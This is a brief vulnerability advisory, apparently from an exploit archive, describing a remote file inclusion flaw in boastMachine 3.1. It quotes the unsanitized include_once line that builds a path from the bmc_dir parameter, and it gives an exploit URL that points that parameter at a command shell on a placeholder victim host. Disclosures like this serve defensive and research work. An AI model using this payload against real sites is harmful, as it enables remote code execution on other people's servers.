boastMachine version 3.1 suffers from a remote file inclusion flaw.
4f1e38cd693d54099520bac58fa6555a3ff15052e3822e73a8470bd81543efb0
# SaVSaK.CoM | SpC-x - The-BeKiR |
# boastMachine v3.1 Version - Remote File Include Vulnerabilities
# Risk : High
# Class: Remote
# Script : boastMachine
# Credits : SpC-x
# Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx - Nukedx - Str0ke
# Code :
# include_once dirname(__FILE__)."/config.php";
# include_once dirname(__FILE__)."/$bmc_dir/main.php";
# Vulnerable :
# http://www.victim.com/boastMachine/vote.php?bmc_dir=Command-Shell